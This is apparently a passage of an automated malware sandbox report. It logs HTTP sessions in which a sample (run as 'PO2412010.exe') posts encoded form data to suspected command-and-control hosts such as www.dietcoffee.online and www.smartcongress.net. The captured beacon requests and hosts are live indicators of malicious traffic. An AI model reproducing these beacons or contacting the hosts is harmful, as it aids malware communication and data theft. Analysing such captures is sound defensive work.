                                                                      Data Raw: 78 32 71 3d 71 43 4f 44 55 31 45 62 77 6e 68 67 36 54 53 6e 61 56 70 53 4a 68 7a 31 6d 48 46 67 6a 72 76 75 36 6c 61 66 55 55 2b 67 30 44 67 5a 68 53 6d 51 6c 4d 44 6e 4a 36 33 32 6f 50 2f 36 64 66 61 6f 52 6e 30 50 36 76 69 4b 79 2f 4d 71 33 57 30 43 68 45 67 6e 78 45 4c 73 72 64 74 38 44 33 35 51 4a 49 43 67 38 4d 35 72 61 66 58 35 30 72 6d 6f 4f 4d 45 52 63 33 69 72 2b 43 30 6d 6d 38 36 77 69 39 39 5a 55 4b 32 37 77 39 52 4a 4e 66 49 57 78 59 38 4f 45 46 50 55 46 34 47 73 2f 6f 2f 54 72 6d 31 61 46 59 4d 70 2f 4a 68 72 61 72 74 35 36 61 48 33 32 45 62 2b 75 61 6c 50 45 65 31 67 48 67 3d 3d
                                                                      Data Ascii: x2q=qCODU1Ebwnhg6TSnaVpSJhz1mHFgjrvu6lafUU+g0DgZhSmQlMDnJ632oP/6dfaoRn0P6viKy/Mq3W0ChEgnxELsrdt8D35QJICg8M5rafX50rmoOMERc3ir+C0mm86wi99ZUK27w9RJNfIWxY8OEFPUF4Gs/o/Trm1aFYMp/Jhrart56aH32Eb+ualPEe1gHg==
                                                                      Dec 10, 2024 15:17:54.418369055 CET391INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.25.3
                                                                      Date: Tue, 10 Dec 2024 14:17:54 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      38192.168.2.114975077.68.64.45805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:55.856019020 CET655OUTPOST /dm4p/ HTTP/1.1
                                                                      Host: www.dietcoffee.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.dietcoffee.online
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.dietcoffee.online/dm4p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 71 43 4f 44 55 31 45 62 77 6e 68 67 34 7a 69 6e 4a 6d 52 53 49 42 7a 32 37 33 46 67 6f 4c 76 69 36 6c 57 66 55 56 36 77 30 51 55 5a 6d 78 79 51 33 39 44 6e 49 36 33 32 67 76 2f 37 51 2f 61 76 52 6e 34 70 36 72 71 4b 79 2b 6f 71 33 54 59 43 69 7a 4d 6b 78 55 4c 35 71 74 74 79 4d 58 35 51 4a 49 43 67 38 49 6f 38 61 66 50 35 31 62 32 6f 4f 74 45 51 66 33 69 73 32 69 30 6d 33 73 36 4f 69 39 39 33 55 4a 7a 75 77 2f 70 4a 4e 66 34 57 79 4b 45 4a 54 56 50 6f 42 34 48 46 2b 34 32 72 73 45 55 33 43 4c 35 65 72 71 31 4d 62 74 67 6a 71 35 4f 67 31 58 54 38 36 38 45 2f 4e 76 51 70 63 74 50 49 31 36 59 39 6a 54 70 70 56 49 39 68 4c 34 6a 5a 34 4c 51 3d
                                                                      Data Ascii: x2q=qCODU1Ebwnhg4zinJmRSIBz273FgoLvi6lWfUV6w0QUZmxyQ39DnI632gv/7Q/avRn4p6rqKy+oq3TYCizMkxUL5qttyMX5QJICg8Io8afP51b2oOtEQf3is2i0m3s6Oi993UJzuw/pJNf4WyKEJTVPoB4HF+42rsEU3CL5erq1Mbtgjq5Og1XT868E/NvQpctPI16Y9jTppVI9hL4jZ4LQ=
                                                                      Dec 10, 2024 15:17:57.098282099 CET391INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.25.3
                                                                      Date: Tue, 10 Dec 2024 14:17:57 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      39192.168.2.114975177.68.64.45805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:58.527914047 CET1668OUTPOST /dm4p/ HTTP/1.1
                                                                      Host: www.dietcoffee.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.dietcoffee.online
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.dietcoffee.online/dm4p/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 71 43 4f 44 55 31 45 62 77 6e 68 67 34 7a 69 6e 4a 6d 52 53 49 42 7a 32 37 33 46 67 6f 4c 76 69 36 6c 57 66 55 56 36 77 30 51 4d 5a 68 44 71 51 6c 75 62 6e 61 71 33 32 2f 66 2f 32 51 2f 61 2b 52 6e 51 74 36 72 6e 33 79 39 41 71 78 78 51 43 6a 42 30 6b 69 30 4c 35 68 4e 74 2f 44 33 34 4e 4a 4a 75 6b 38 4d 4d 38 61 66 50 35 31 64 61 6f 61 73 45 51 54 58 69 72 2b 43 30 36 6d 38 36 31 69 39 6c 42 55 4b 65 56 77 4c 56 4a 4e 37 63 57 2b 5a 38 4a 4d 6c 50 75 47 34 48 64 2b 34 71 30 73 45 49 56 43 4b 63 37 72 73 46 4d 5a 49 42 38 76 34 6d 70 32 6d 79 42 68 73 34 43 48 4e 49 61 51 74 72 66 32 72 4d 66 68 58 4e 70 51 71 63 53 57 4b 66 34 67 75 53 6c 71 64 4c 46 6a 4b 56 68 44 41 6f 34 43 30 6e 72 31 45 32 49 7a 7a 2f 72 71 6a 44 35 68 4a 61 73 48 71 6f 52 41 31 35 50 67 56 72 61 57 32 5a 66 58 51 67 7a 63 6f 6d 75 64 5a 38 66 76 48 72 4e 36 4b 41 63 4d 69 6d 37 57 50 4e 48 78 75 63 57 38 41 31 75 44 73 76 78 4a 45 58 37 50 65 4c 32 68 79 4d 6b 64 43 6a 7a 41 78 64 49 54 38 78 43 67 46 53 7a 53 45 [TRUNCATED]
                                                                      Data Ascii: x2q=qCODU1Ebwnhg4zinJmRSIBz273FgoLvi6lWfUV6w0QMZhDqQlubnaq32/f/2Q/a+RnQt6rn3y9AqxxQCjB0ki0L5hNt/D34NJJuk8MM8afP51daoasEQTXir+C06m861i9lBUKeVwLVJN7cW+Z8JMlPuG4Hd+4q0sEIVCKc7rsFMZIB8v4mp2myBhs4CHNIaQtrf2rMfhXNpQqcSWKf4guSlqdLFjKVhDAo4C0nr1E2Izz/rqjD5hJasHqoRA15PgVraW2ZfXQgzcomudZ8fvHrN6KAcMim7WPNHxucW8A1uDsvxJEX7PeL2hyMkdCjzAxdIT8xCgFSzSENwCTpLQhyXgKoxxGrkRQQ/jVJ6JRxf43VAEfTfKC0RFXAVFuTj93gRS6sMoxXP4O9dCfGB+PEW7g/IkuGkqZj+vG/v1Ey0yHZralO8/OlGxjweluSBwUQCJBG1XdUI5zEAeBepdCEWEUaYUG2UkjGkuAEehjK/QBoHNg9r81LoTL+m1xU9DJVkO5wIyL8cZWtirEZr0YeptCRqZOZZ9j1+tq/Z1ayG6okwMzvxfdJdEILBJFFoPBrloiedFk2uAI025JLKeu/00ln+GCGQt3MLnBS5EfdZnEuw0zRVfexV4TuW8yBGYQesLllTPGd4wFYVRLZI0jaw3TbeuJV/NR1BYHykKFWGzoIdnspQ4DqoFtSCPRQnq2M58Y/IFhABQTJM7tcB7wzpXJwWOVlMn7z6/9rsfWHFD6ot1fY5ibXY1BlDrWkFtrgPXCt+48KD+9bbZPN+E04nyzrKM6WKZNRvgvY0K7R3t0NmDR9OBllh/jQf2UOmfeRLGzx9XCj4yNr0fG6hC22WXMcWc5toPelfOPC5s44g5Is1CUIHiw6JfTAN/4zd/6j9jqH5L/KGaAI7gsPHI7BwrplyFRy/YTqdtEoOdXmgTiiTajqXdMBsrEhG3MONTnsKd+u6ve6+w97R+zfQiMYAjs6IQbaW/OJ7VfNBxVzsVF9R [TRUNCATED]
                                                                      Dec 10, 2024 15:17:59.820360899 CET391INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.25.3
                                                                      Date: Tue, 10 Dec 2024 14:17:59 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      40192.168.2.114975277.68.64.45805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:18:01.195872068 CET363OUTGET /dm4p/?Gn6D=5fNLN8qhqB3P&x2q=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AiTCMhthfFHlaAoSHmNs0Z/b09PqcCq4Db34= HTTP/1.1
                                                                      Host: www.dietcoffee.online
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:18:02.419389963 CET373INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.25.3
                                                                      Date: Tue, 10 Dec 2024 14:18:02 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 6d 34 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      41192.168.2.1149753146.88.233.115805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:18:09.057461023 CET635OUTPOST /qtfx/ HTTP/1.1
                                                                      Host: www.smartcongress.net
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.smartcongress.net
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.smartcongress.net/qtfx/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 48 66 6c 45 38 6c 2b 2b 76 34 34 48 74 4b 51 7a 7a 35 2b 2f 7a 47 4b 54 7a 79 69 58 61 43 6a 56 36 42 4a 4d 70 73 44 56 30 4d 6d 31 73 6d 46 71 38 6a 6d 49 6b 4a 4a 74 59 44 6a 47 4d 58 36 72 71 73 32 77 43 72 5a 56 57 70 70 42 77 6f 68 6a 78 6f 4f 76 48 30 36 65 66 6a 75 33 4a 45 39 68 4f 57 35 70 66 39 45 6d 69 31 64 48 32 56 4f 6c 6c 39 56 71 67 6a 58 52 72 63 58 71 64 76 32 73 74 4b 6c 30 76 6c 32 67 57 43 35 72 62 70 43 52 59 6b 33 35 4f 6a 2b 35 45 48 35 34 4f 49 38 34 34 4b 59 35 59 66 30 6d 61 33 4b 47 50 53 4a 4e 58 79 61 71 6d 50 4e 4c 4b 46 61 2f 58 72 5a 2b 36 41 3d 3d
                                                                      Data Ascii: x2q=HflE8l++v44HtKQzz5+/zGKTzyiXaCjV6BJMpsDV0Mm1smFq8jmIkJJtYDjGMX6rqs2wCrZVWppBwohjxoOvH06efju3JE9hOW5pf9Emi1dH2VOll9VqgjXRrcXqdv2stKl0vl2gWC5rbpCRYk35Oj+5EH54OI844KY5Yf0ma3KGPSJNXyaqmPNLKFa/XrZ+6A==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      42192.168.2.1149754146.88.233.115805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:18:11.719854116 CET655OUTPOST /qtfx/ HTTP/1.1
                                                                      Host: www.smartcongress.net
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.smartcongress.net
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.smartcongress.net/qtfx/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 48 66 6c 45 38 6c 2b 2b 76 34 34 48 2f 37 67 7a 30 65 53 2f 79 6d 4b 53 2f 53 69 58 4e 53 69 63 36 42 31 4d 70 6f 53 4b 30 2b 79 31 74 48 31 71 2f 6d 53 49 6e 4a 4a 74 51 6a 69 43 54 48 36 61 71 73 71 4f 43 72 6c 56 57 70 39 42 77 70 52 6a 79 66 53 73 64 45 36 51 53 44 75 69 57 55 39 68 4f 57 35 70 66 39 68 75 69 32 74 48 32 45 65 6c 6a 70 42 74 70 44 58 53 39 4d 58 71 5a 76 32 67 74 4b 6c 43 76 6e 54 48 57 45 39 72 62 70 79 52 62 31 33 34 5a 54 2b 2f 61 33 34 6e 4f 4b 74 4f 6a 34 52 70 62 4d 64 58 53 30 53 5a 4f 55 45 58 48 52 54 39 6c 63 46 4a 65 6a 37 50 65 61 38 33 68 44 73 6e 69 32 72 47 63 37 4e 6e 77 52 39 70 39 61 76 6d 38 47 4d 3d
                                                                      Data Ascii: x2q=HflE8l++v44H/7gz0eS/ymKS/SiXNSic6B1MpoSK0+y1tH1q/mSInJJtQjiCTH6aqsqOCrlVWp9BwpRjyfSsdE6QSDuiWU9hOW5pf9hui2tH2EeljpBtpDXS9MXqZv2gtKlCvnTHWE9rbpyRb134ZT+/a34nOKtOj4RpbMdXS0SZOUEXHRT9lcFJej7Pea83hDsni2rGc7NnwR9p9avm8GM=
                                                                      Dec 10, 2024 15:18:12.988253117 CET380INHTTP/1.1 404 Not Found
                                                                      content-type: text/html; charset=iso-8859-1
                                                                      content-length: 196
                                                                      date: Tue, 10 Dec 2024 14:18:12 GMT
                                                                      server: LiteSpeed
                                                                      x-tuned-by: N0C
                                                                      connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      43192.168.2.1149755146.88.233.115805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:18:14.392503023 CET1668OUTPOST /qtfx/ HTTP/1.1
                                                                      Host: www.smartcongress.net
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.smartcongress.net
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.smartcongress.net/qtfx/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 48 66 6c 45 38 6c 2b 2b 76 34 34 48 2f 37 67 7a 30 65 53 2f 79 6d 4b 53 2f 53 69 58 4e 53 69 63 36 42 31 4d 70 6f 53 4b 30 2b 71 31 74 31 39 71 38 46 36 49 6d 4a 4a 74 61 44 69 50 54 48 36 39 71 73 79 53 43 72 70 6a 57 71 46 42 32 37 70 6a 36 4f 53 73 49 55 36 51 4f 7a 76 46 4a 45 39 77 4f 58 56 6c 66 39 78 75 69 32 74 48 32 48 57 6c 79 39 56 74 72 44 58 52 72 63 58 63 64 76 33 2f 74 4b 74 53 76 6e 57 77 56 30 64 72 62 4e 57 52 64 48 76 34 62 7a 2b 39 62 33 34 76 4f 4b 68 64 6a 34 39 6c 62 4e 6f 36 53 31 6d 5a 4d 78 5a 6a 51 79 7a 61 34 50 31 31 4b 56 6e 64 52 50 41 68 6c 6a 41 2b 71 55 50 54 4d 4c 52 43 2f 41 34 41 6c 71 37 6b 76 77 35 36 50 36 67 47 66 62 51 79 4c 36 43 2f 78 69 30 76 79 31 6d 30 2f 64 58 6d 37 44 34 54 65 4e 71 47 62 43 6f 33 6b 4f 42 2b 42 49 53 6a 50 76 31 73 68 31 5a 34 52 61 66 6e 58 48 72 42 72 61 58 62 34 69 72 36 57 32 4b 78 6e 43 74 6b 6d 67 45 43 49 64 43 42 79 30 33 4c 66 51 2b 37 42 59 75 4d 44 79 2b 4f 35 46 56 78 42 55 34 77 55 71 35 78 6b 39 4a 39 59 65 [TRUNCATED]
                                                                      Data Ascii: x2q=HflE8l++v44H/7gz0eS/ymKS/SiXNSic6B1MpoSK0+q1t19q8F6ImJJtaDiPTH69qsySCrpjWqFB27pj6OSsIU6QOzvFJE9wOXVlf9xui2tH2HWly9VtrDXRrcXcdv3/tKtSvnWwV0drbNWRdHv4bz+9b34vOKhdj49lbNo6S1mZMxZjQyza4P11KVndRPAhljA+qUPTMLRC/A4Alq7kvw56P6gGfbQyL6C/xi0vy1m0/dXm7D4TeNqGbCo3kOB+BISjPv1sh1Z4RafnXHrBraXb4ir6W2KxnCtkmgECIdCBy03LfQ+7BYuMDy+O5FVxBU4wUq5xk9J9YeZRkduX8Y9O53CwcPuZ/xAEu2ahG7BOUDGRz1H4ftxGX3mTF1lxw04sERiVFqfKwZuEsms4LH5oMxOXIPt0/ZehdR8bQgFMMIxVC6LyV9YHiWjowgulEsb1LkxmvGLgUR2hJeJESUHZEPhttu7PBFUmcLSx/Y38Y9bCGWdvR4BEnY9rfzxQi7tp7Fj/aidOIUyodrXgbrGhOn/xoXfYbzw/jXTKr/xLRU3LB1f6c2qBo5lp9G+vDNFep/b0po/de+X3ISLE9zl6YhNJG+Mwvvt0fz5LO/Cy92ynIB+lpPztp4YpnRaHoSeTKNW5P5x7uNVI53F/T6HmCcqXlpoRtZIza2MFZ3vaeFOmYaa0xebYpBkP97T9jMTlSReshVCxyGtXrqQ6pKX+jK91J9hC4QrfMJpnW+bHay761RzYPSx0y5Y3ywRr8J5l5wjwZeY3MufseYj/zl8SZ7Wxr62sq88Tx22nm3exhhLWf4se+JvaMeSZzvB/yObdDI3rad7VBqG/K56sbpUwHIURATBaNUP4Ss6SScSXAGEjmK2nQHwD8biCDBZQsJrSTujTPl9vYhrQlX4pQ8KfT0WXvZi4uuMlFufY4OW69FPeOt48wruK/TYInXYqq98E61oQuUx6pyA9odlCHUpsiR2H+6J6CIXjpwSxEcQfIO1E [TRUNCATED]
                                                                      Dec 10, 2024 15:18:15.652673006 CET380INHTTP/1.1 404 Not Found
                                                                      content-type: text/html; charset=iso-8859-1
                                                                      content-length: 196
                                                                      date: Tue, 10 Dec 2024 14:18:15 GMT
                                                                      server: LiteSpeed
                                                                      x-tuned-by: N0C
                                                                      connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      44192.168.2.1149756146.88.233.115805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:18:17.054034948 CET363OUTGET /qtfx/?x2q=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLbzmLeHv/c15PEmolRusqu0oXm0K1+tUNhxI=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.smartcongress.net
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:18:18.365518093 CET380INHTTP/1.1 404 Not Found
                                                                      content-type: text/html; charset=iso-8859-1
                                                                      content-length: 196
                                                                      date: Tue, 10 Dec 2024 14:18:18 GMT
                                                                      server: LiteSpeed
                                                                      x-tuned-by: N0C
                                                                      connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:09:14:17
                                                                      Start date:10/12/2024
                                                                      Path:C:\Users\user\Desktop\PO2412010.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\PO2412010.exe"
                                                                      Imagebase:0x1e0000
